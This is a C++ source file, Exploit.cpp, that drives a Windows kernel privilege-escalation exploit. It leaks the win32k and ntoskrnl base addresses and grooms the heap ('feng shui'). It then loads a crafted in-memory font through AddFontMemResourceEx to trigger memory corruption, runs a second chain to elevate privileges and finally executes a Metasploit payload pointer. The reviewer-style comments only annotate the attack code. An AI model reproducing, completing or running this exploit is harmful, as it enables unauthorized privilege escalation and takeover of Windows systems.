// Exploit.cpp : Defines the entry point for the console application.
//
#include <Windows.h>

#include "Exploit.h"
#include "Win32kLeaker.h"
#include "Exploiter.h"
#include "FontData.h"

// Transfers control to the buffer at lpPayload by calling it as a
// zero-argument, void-returning function.
//
// lpPayload: address of the code to run. It is used as-is: nothing here
//            checks that it is non-null or that the page is executable,
//            so an invalid pointer faults inside the call.
// Returns nothing; control comes back only if the called code returns.
static VOID ExecutePayload(LPVOID lpPayload) 
{
	using PayloadFn = VOID (*)();
	const auto fnPayload = reinterpret_cast<PayloadFn>(lpPayload);
	fnPayload();
}

// Drives the stages declared in Exploiter.h / Win32kLeaker.h in a fixed
// order and finally calls lpPayload as code.
//
// Stage order matters: the win32k base from LeakWin32kAddress() is an input
// to ExploiterSetupFirstChain(), ExploiterGetNtBase() is only read after
// ExploiterRunFirstChain(), and ExploiterSetupSecondChain() consumes both
// addresses. The AddFontMemResourceEx()/RemoveFontMemResourceEx() pair sits
// between first-chain setup and first-chain execution.
//
// lpPayload: code pointer handed to ExecutePayload(); not validated here.
// Returns nothing. The only early exit is a failed win32k leak; every other
// helper's result is ignored (none of them returns a status to this caller,
// or the status is not checked).
VOID Exploit(LPVOID lpPayload)
{
	// Variables.
	DWORD cFonts;                          // out-param of AddFontMemResourceEx: number of fonts installed; never read afterwards
	PVOID pFontData = (PVOID)fontData;     // fontData is the in-memory font blob from FontData.h; sizeof(fontData) below is its byte length
	DWORD ExAllocatePoolWithTag_offset;    // NOTE(review): declared but never assigned or read in this function
	ULONGLONG win32kBaseAddr;
	ULONGLONG ntBaseAddr;

	ExploiterInit();

	// Leak the win32k base address.
	win32kBaseAddr = LeakWin32kAddress();
	// NULL compared against a ULONGLONG: on this toolchain NULL is 0, so this
	// is a plain zero check meaning "leak failed" — nothing set up so far is torn down.
	if (win32kBaseAddr == NULL) {
		return;
	}

	ExploiterSetupFirstChain(win32kBaseAddr);
	ExploiterDoFengShui();

	// Trigger the memory corruption: Render the font and cause memory overwrite.
	cFonts = 0;
	// NOTE(review): fh is not checked before RemoveFontMemResourceEx(). AddFontMemResourceEx
	// returns NULL on failure, so a failed load is removed (and the later stages run) regardless.
	HANDLE fh = AddFontMemResourceEx(pFontData, sizeof(fontData), 0, &cFonts);
	// Clean up: remove the font from memory.
	RemoveFontMemResourceEx(fh);

	// First Stage: Leak ntoskrnl
	ExploiterRunFirstChain();
	ntBaseAddr = ExploiterGetNtBase();   // NOTE(review): no zero check, unlike win32kBaseAddr above — presumably should mirror it; verify against Exploiter.h

	// Second Stage: elevate privileges
	ExploiterSetupSecondChain(win32kBaseAddr, ntBaseAddr);
	ExploiterRunSecondChain();
	ExpoiterCleanUp();   // name as declared in Exploiter.h (spelling presumably intended as "Exploiter"; keep in sync with the header)

	// Execute msf payload: lpPayload is called directly as a function and is
	// not validated beforehand (see ExecutePayload).
	ExecutePayload(lpPayload);
}

